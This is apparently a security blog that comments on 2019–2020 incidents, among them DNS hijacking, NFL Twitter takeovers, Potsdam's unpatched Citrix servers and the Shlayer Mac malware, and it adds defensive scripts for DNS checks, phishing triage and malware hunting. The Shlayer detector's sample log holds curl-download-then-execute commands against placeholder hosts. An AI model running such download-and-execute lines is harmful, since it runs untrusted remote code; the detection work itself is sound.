Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 is believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected, including government ministries and agencies, private industry, and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation-state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting: tricking users into entering their login credentials into a fraudulent web site or application and storing them for use in a later operation. It usually starts with a phishing email that sends the victim to a look-alike of a site they legitimately use. Here the attackers did not even need a lure: with the DNS records altered, a user typing the genuine address of their webmail service was delivered to the attacker's server, and the hostname in the address bar was the real one.

Once the attackers had amassed enough credential data, knowing that users often reuse the same password across multiple logins, they could attempt to breach personal accounts (Twitter, Facebook, Gmail, and so on) as well as official government or business accounts. The latter are the crown jewels, although the personal accounts may also open the door to further opportunistic, targeted attacks.

What I find most alarming is that certain DNS top-level domain providers were breached. The DNS servers themselves do not appear to have been tampered with, but a number of the organizations controlling them were compromised, and control of the organization is all an attacker needs to change the records those servers hand out. Those organizations should know better and should have implemented stronger security controls and security awareness.
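The check a defender can run against this class of attack, as an added example not drawn from the reporting quoted above: resolve your own critical records through several independent resolvers and compare the answers with a signed-off baseline. The baseline, the `dig +short` output and the names (example.gov, attacker.example) are constructed sample data.

```python
"""Spot DNS hijacking by comparing what independent resolvers return for your
records against a signed-off baseline. Added illustration, not code from the
reporting quoted above: the baseline and the per-resolver answers are
constructed sample data standing in for `dig @<resolver> <name> <type> +short`
output, and example.gov / attacker.example are placeholder names."""


def parse_dig_short(text):
    """Turn `dig +short` output into a set of answers (empty set: no data)."""
    return {line.strip() for line in text.splitlines() if line.strip()}


# Records the organisation approved (constructed).
BASELINE = {
    ("example.gov", "NS"):     {"ns1.example.gov.", "ns2.example.gov."},
    ("example.gov", "MX"):     {"10 mail.example.gov."},
    ("mail.example.gov", "A"): {"203.0.113.10"},
    ("www.example.gov", "A"):  {"203.0.113.20"},
}

# Raw `dig +short` output per resolver (constructed). Every resolver hands out
# attacker-controlled NS and mail records, which points at the registrar or
# TLD operator rather than a single poisoned cache; only one resolver differs
# on www, which is the pattern of a local cache problem instead.
DIG_OUTPUT = {
    "8.8.8.8": {
        ("example.gov", "NS"):     "ns2.attacker.example.\nns1.attacker.example.\n",
        ("example.gov", "MX"):     "10 mail.example.gov.\n",
        ("mail.example.gov", "A"): "198.51.100.77\n",
        ("www.example.gov", "A"):  "203.0.113.20\n",
    },
    "1.1.1.1": {
        ("example.gov", "NS"):     "ns1.attacker.example.\nns2.attacker.example.\n",
        ("example.gov", "MX"):     "10 mail.example.gov.\n",
        ("mail.example.gov", "A"): "198.51.100.77\n",
        ("www.example.gov", "A"):  "203.0.113.20\n",
    },
    "9.9.9.9": {
        ("example.gov", "NS"):     "ns1.attacker.example.\nns2.attacker.example.\n",
        ("example.gov", "MX"):     "10 mail.example.gov.\n",
        ("mail.example.gov", "A"): "198.51.100.77\n",
        ("www.example.gov", "A"):  "198.51.100.99\n",
    },
}


def classify(baseline, dig_output):
    """Return {(name, type): (verdict, [resolvers that disagree with baseline])}."""
    report = {}
    resolvers = sorted(dig_output)
    for key, expected in baseline.items():
        disagreeing = [r for r in resolvers
                       if parse_dig_short(dig_output[r].get(key, "")) != expected]
        if not disagreeing:
            verdict = "ok"
        elif len(disagreeing) == len(resolvers):
            # Every resolver disagrees with the baseline: the authoritative
            # data itself changed, so check the registrar account and the NS
            # delegation before anything else.
            verdict = "authoritative-change"
        else:
            # Only some resolvers disagree: cache poisoning or a local issue.
            verdict = "resolver-divergence"
        report[key] = (verdict, disagreeing)
    return report


if __name__ == "__main__":
    for (name, rtype), (verdict, bad) in classify(BASELINE, DIG_OUTPUT).items():
        print(f"{name:18} {rtype:3} {verdict:22} {' '.join(bad)}")
```

When every resolver disagrees with the baseline, the authoritative data has changed and the first place to look is the registrar account and the NS delegation, which is exactly the layer these attackers went after; when a single resolver disagrees, suspect that resolver's cache instead. Run it from a cron job against your mail, VPN and NS records and page on anything other than "ok".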

This demonstrates how anyone can be the victim of a cyber attack.

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, including the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

Hacking a Twitter account is not all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams' corporate networks and other online presence. Why have they so far been successful only with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using 2FA there is a much greater chance this attack would not have been successful. I specifically call out an authenticator app rather than SMS because the latter is vulnerable: a code delivered by text message can be intercepted or redirected through SIM swapping, whereas a TOTP code is computed on the device from a shared secret and never crosses the carrier's network.

It will be interesting to see why only these five teams were selected out of the thirty-two in the NFL today. I doubt it has anything to do with a specific motivation to attack these teams; more likely it comes down to lax security on those particular Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, which puts the average cost of a cyber attack to a Singapore-based business at approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.

And:

Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies it surveyed, arrived at these numbers. The cost of internal incident response is hard to quantify accurately: staff time, lost productivity and delayed projects rarely show up on a single invoice. Spend on external help for breach remediation is much easier to account for.

It is unlikely that all of these Singapore-based companies used only outside assistance. A hybrid approach, where internal responders work alongside external help of some sort, is far more common.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect its administration from the internet after a cyber attack. Specifics about how the attack was executed are thin; the city attributes it to a vulnerability in a third-party provider's system:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details and sounds wordsmithed to deflect any potential blame. A German journalist believes the attackers may have exploited vulnerable public-facing Citrix ADC servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-19781 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

If true, this is not at all related to a "weak point in the system of an external provider" but a failure of the city's IT department to apply the mitigation for CVE-2019-19781. Citrix had published mitigation steps more than a month earlier, and the flaw was being exploited in the wild well before this incident; leaving an internet-facing appliance unmitigated for that long almost guarantees compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking verdicts on file samples and URLs. Although the service offers a variety of benefits, it should never be the sole trusted resource for analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their "analysis checklist". They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email, as in what's the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for judging files and URLs, not a one-stop shop to be trusted unequivocally. A clean result means only that none of the engines flagged the item at the time it was scanned; a URL nobody has submitted before has no detections by definition, and a freshly registered phishing domain is exactly that. Remember too that anything you upload becomes visible to other VirusTotal subscribers, the attacker included, so a targeted sample deserves thought before it goes in. Any incident response playbook leveraging free services like VT should include multiple tools, whether on-site or cloud-based, together with the context of the report itself: the headers, the sender, and what the link actually does.

The same goes for Hybrid Analysis. It is a wonderful tool, most often extremely capable of determining whether a sample is malicious, but it is not infallible, and like any free service it should be used in conjunction with others. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate action.
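As an added example (not code from the quoted post, and using constructed emails rather than a real report), here is the shape of a triage step that refuses to let a 0/72 VirusTotal result close the ticket on its own. The VirusTotal and sandbox verdicts are passed in as plain values, assumed to have been fetched separately; the scoring weights and the threshold are assumptions to be tuned per environment, and all domains in the samples are placeholders.

```python
"""Triage a reported phishing link on more than the VirusTotal verdict. Added
example, not code from the post quoted above. VirusTotal and sandbox results
are passed in as plain values (constructed here, not fetched), and the two
emails are constructed samples built on placeholder domains."""
import email
import re
from email.utils import parseaddr
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def _auth_result(auth_header, mechanism):
    """Read spf=/dkim= out of an Authentication-Results header; 'none' if absent."""
    m = re.search(rf"\b{mechanism}=(\w+)", auth_header)
    return m.group(1).lower() if m else "none"


def parse_indicators(raw):
    """Collect the context a VT-only workflow skips: sender authentication,
    From/Reply-To mismatch, and whether links leave the sender's domain."""
    msg = email.message_from_string(raw)
    auth = msg.get("Authentication-Results", "")
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    reply_domain = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()
    body = msg.get_payload() if not msg.is_multipart() else ""
    urls = URL_RE.findall(body)
    hosts = {urlparse(u).hostname or "" for u in urls}
    return {
        "spf": _auth_result(auth, "spf"),
        "dkim": _auth_result(auth, "dkim"),
        "reply_to_mismatch": bool(reply_domain) and reply_domain != from_domain,
        "offdomain_links": sorted(h for h in hosts
                                  if h != from_domain and not h.endswith("." + from_domain)),
        "urls": urls,
    }


def score(ind, vt_positives, sandbox_verdict):
    """Weighted sum of independent signals; weights are an assumption."""
    points, reasons = 0, []
    if vt_positives is None:
        points += 1
        reasons.append("URL unknown to VT: no evidence either way")
    elif vt_positives > 0:
        points += 3
        reasons.append(f"VT positives: {vt_positives}")
    if sandbox_verdict == "malicious":
        points += 3
        reasons.append("sandbox verdict: malicious")
    if ind["spf"] != "pass":
        points += 2
        reasons.append(f"spf={ind['spf']}")
    if ind["dkim"] != "pass":
        points += 1
        reasons.append(f"dkim={ind['dkim']}")
    if ind["reply_to_mismatch"]:
        points += 1
        reasons.append("Reply-To domain differs from From")
    if ind["offdomain_links"]:
        points += 1
        reasons.append("links leave sender domain: " + ", ".join(ind["offdomain_links"]))
    return points, reasons


def triage(raw, vt_positives, sandbox_verdict):
    """Return (decision, points, reasons); 3 or more points keeps the ticket open."""
    points, reasons = score(parse_indicators(raw), vt_positives, sandbox_verdict)
    return ("escalate" if points >= 3 else "close"), points, reasons


# Constructed sample: looks like the quoted scenario, 0 VT detections.
PHISH = """\
From: IT Support <it-support@example.org>
Reply-To: helpdesk-example-org@mail.example
To: user@example.org
Subject: Password expires today
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=example.org; dkim=none

Your password expires in 2 hours. Sign in now: https://example-org-login.example/owa
"""

# Constructed sample: a legitimate internal mail, also 0 VT detections.
LEGIT = """\
From: HR <hr@example.org>
To: user@example.org
Subject: Benefits enrolment
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=example.org; dkim=pass header.d=example.org

Enrolment opens Monday: https://hr.example.org/benefits
"""

if __name__ == "__main__":
    # Both links come back clean on VT; only the surrounding context separates them.
    for name, raw in (("phish", PHISH), ("legit", LEGIT)):
        print(name, triage(raw, vt_positives=0, sandbox_verdict="benign"))
```

Both samples score zero on the VirusTotal axis; the phish still escalates on SPF failure, a Reply-To pointing elsewhere and a link that leaves the sender's domain, which is the whole point of keeping the headers in the workflow. Treat "never seen by VT" as a mild positive signal rather than a clean bill of health.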

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or the apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily no sensitive files appear to have been compromised in the attack. Still, one has to wonder how a government contractor allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Is the bar set so low that a commodity ransomware attack can succeed?

While no company can guarantee it is safe from attack, there is no reason a run-of-the-mill ransomware attack should succeed. There are myriad endpoint security controls, from next-generation antivirus to endpoint detection and response, capable of either preventing attacks like ransomware or at least providing visibility into them, and the basics (offline, tested backups; least privilege on file shares; prompt patching) limit the blast radius when prevention fails.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find the softest target. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years it has done a lot of valuable work to keep the web a safe place to browse. In its latest move, Mozilla has reviewed the Firefox add-on catalogue and removed nearly two hundred extensions for containing malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is a single, relatively unknown company publishing that many add-ons? It is a huge red flag, and the reason for the ban is the important part: an add-on that fetches and executes code from a remote server can change its behaviour after review without anyone noticing, which is exactly why Mozilla's add-on policies forbid loading remote code.

Laughably Unsophisticated Mac Malware

Major malware outbreaks on macOS are quite rare, but the operating system is by no means immune to what Windows users have endured for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is "a rather ordinary piece of malware" that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said "is basically the calling card of the entire family."

Another banal detail about Shlayer is its previously mentioned infection method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Stay away from web sites offering pirated content, however good you think your self-control, browsing hygiene and common sense are. A site that tells you to install a Flash update is handing you the malware itself; Flash has been effectively deprecated for years. Is one free pirated movie worth the work of rebuilding your computer after it gets infected with malware it should never have had in the first place?
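To turn the "calling card" above into something an analyst can run, here is an added example (not Kaspersky's or the page's code) that applies two rules to a constructed process-execution log: the literal `curl -f0L` option combination, and a file that curl downloads and the same parent process then executes and deletes. The log format (timestamp, pid, ppid, user, command line), the hostnames and the file names are assumptions; the `ioreg` and `sw_vers` lines are only there as the kind of system-identification context the analysis mentions and are not matched by a rule.

```python
"""Hunt for Shlayer-style behaviour in process execution logs. Added example,
not Kaspersky's or the page's code. The log below is constructed (format:
timestamp pid ppid user command line), the hostnames are placeholders, and the
rules encode only what the quoted analysis describes: curl -f0L, and a
download that is executed and then deleted under the same parent process."""
import shlex
from collections import defaultdict

INTERPRETERS = {"bash", "sh", "zsh", "python", "osascript", "open"}

# Constructed sample log: a fake "Flash" installer (parent 501) fingerprints
# the host, downloads with curl -f0L, runs the payload and removes it; a
# second, benign-looking script install (parent 600) downloads and runs but
# never deletes its file and does not use -f0L.
SAMPLE_LOG = """\
2020-01-24T10:00:01 501 500 alice /bin/bash /Volumes/FlashUpdate/Install.app/Contents/MacOS/Install
2020-01-24T10:00:02 502 501 alice ioreg -rd1 -c IOPlatformExpertDevice
2020-01-24T10:00:02 503 501 alice sw_vers -productVersion
2020-01-24T10:00:03 504 501 alice curl -f0L https://cdn.example/dl?id=abc -o /tmp/.xyz
2020-01-24T10:00:04 505 501 alice /bin/bash /tmp/.xyz
2020-01-24T10:00:05 506 501 alice rm -f /tmp/.xyz
2020-01-24T10:01:00 601 600 alice curl -fsSL https://get.example/install.sh -o /tmp/install.sh
2020-01-24T10:01:01 602 600 alice /bin/bash /tmp/install.sh
"""


def parse_log(text):
    """One dict per line; the command line is split shell-style into argv."""
    rows = []
    for line in text.strip().splitlines():
        ts, pid, ppid, user, cmd = line.split(maxsplit=4)
        rows.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                     "user": user, "argv": shlex.split(cmd)})
    return rows


def basename(path):
    return path.rsplit("/", 1)[-1]


def curl_output_path(argv):
    """Path written by `curl ... -o PATH`, or None if this is not such a call."""
    if argv and basename(argv[0]) == "curl":
        for i, arg in enumerate(argv):
            if arg == "-o" and i + 1 < len(argv):
                return argv[i + 1]
    return None


def _executes(argv, path):
    return argv[0] == path or (basename(argv[0]) in INTERPRETERS and path in argv[1:])


def _removes(argv, path):
    return basename(argv[0]) == "rm" and path in argv


def detect(rows):
    """Return [(pid, rule)]; for the sequence rule pid is the parent process."""
    findings = []
    by_parent = defaultdict(list)
    for row in rows:
        by_parent[row["ppid"]].append(row)
        # Rule 1: the exact option combination the analysis calls the family's
        # calling card (-f fail silently, -0 force HTTP/1.0, -L follow redirects).
        if basename(row["argv"][0]) == "curl" and "-f0L" in row["argv"]:
            findings.append((row["pid"], "curl -f0L"))
    # Rule 2: under one parent, a curl download is executed and afterwards removed.
    for ppid, procs in by_parent.items():
        for i, proc in enumerate(procs):
            path = curl_output_path(proc["argv"])
            if not path:
                continue
            later = procs[i + 1:]
            exec_at = next((j for j, p in enumerate(later) if _executes(p["argv"], path)), None)
            if exec_at is not None and any(_removes(p["argv"], path) for p in later[exec_at + 1:]):
                findings.append((ppid, f"download-execute-delete {path}"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(parse_log(SAMPLE_LOG)):
        print(pid, rule)
```

Rule 1 is cheap and specific but trivially changed by the authors; rule 2 survives a renamed option set because it keys on the behaviour the analysis describes. Feed it whatever your EDR or `log stream --predicate 'process == "bash"'` style telemetry gives you, mapped to the same five fields.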

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe of tech.co wrote one of the worst clickbait headlines I have seen recently, stating that cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article itself makes a much narrower claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 surveyed over 2,700 experts across 100 countries. Those experts were ranking risks to their own businesses, not overall global risk as the clickbait headline suggests.

Overall it is not a bad article, but the headline hyperbole is strong with this one.

How Jeff Bezos’ iPhone X Was Hacked by Saudi Arabia

Jeff Bezos owns not just Amazon but also the Washington Post, a newspaper highly critical of both President Donald Trump and Mohammad Bin Salman Al Saud. This in-depth New York Times article details a likely scenario for how Jeff Bezos's iPhone X was hacked, purportedly by Saudi Arabia.